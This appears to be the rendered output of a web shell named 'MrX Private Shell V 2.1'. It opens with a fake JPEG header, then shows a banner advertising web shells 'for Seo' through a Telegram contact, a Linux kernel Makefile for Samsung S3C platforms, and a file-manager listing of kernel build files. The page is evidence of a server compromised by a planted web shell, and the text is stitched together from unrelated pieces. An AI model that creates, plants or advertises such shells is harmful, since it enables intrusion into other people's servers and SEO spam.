����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# SPDX-License-Identifier: GPL-2.0 # # Copyright 2009 Simtec Electronics ccflags-$(CONFIG_ARCH_MULTIPLATFORM) += -I$(srctree)/$(src)/include ifdef CONFIG_ARCH_S3C24XX include $(srctree)/$(src)/Makefile.s3c24xx endif ifdef CONFIG_ARCH_S3C64XX include $(srctree)/$(src)/Makefile.s3c64xx endif # Objects we always build independent of SoC choice obj-y += init.o cpu.o # ADC obj-$(CONFIG_S3C_ADC) += adc.o # devices obj-$(CONFIG_SAMSUNG_ATAGS) += platformdata.o obj-$(CONFIG_SAMSUNG_ATAGS) += devs.o obj-$(CONFIG_SAMSUNG_ATAGS) += dev-uart.o obj-$(CONFIG_GPIO_SAMSUNG) += gpio-samsung.o # PM support obj-$(CONFIG_SAMSUNG_PM) += pm.o pm-common.o obj-$(CONFIG_SAMSUNG_PM_GPIO) += pm-gpio.o obj-$(CONFIG_SAMSUNG_WAKEMASK) += wakeup-mask.o
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Kconfig | File | 5.17 KB | 0644 |
|
| Kconfig.s3c24xx | File | 12.89 KB | 0644 |
|
| Kconfig.s3c64xx | File | 7.94 KB | 0644 |
|
| Makefile | File | 753 B | 0644 |
|
| Makefile.boot | File | 185 B | 0644 |
|
| Makefile.s3c24xx | File | 3.13 KB | 0644 |
|
| Makefile.s3c64xx | File | 1.83 KB | 0644 |
|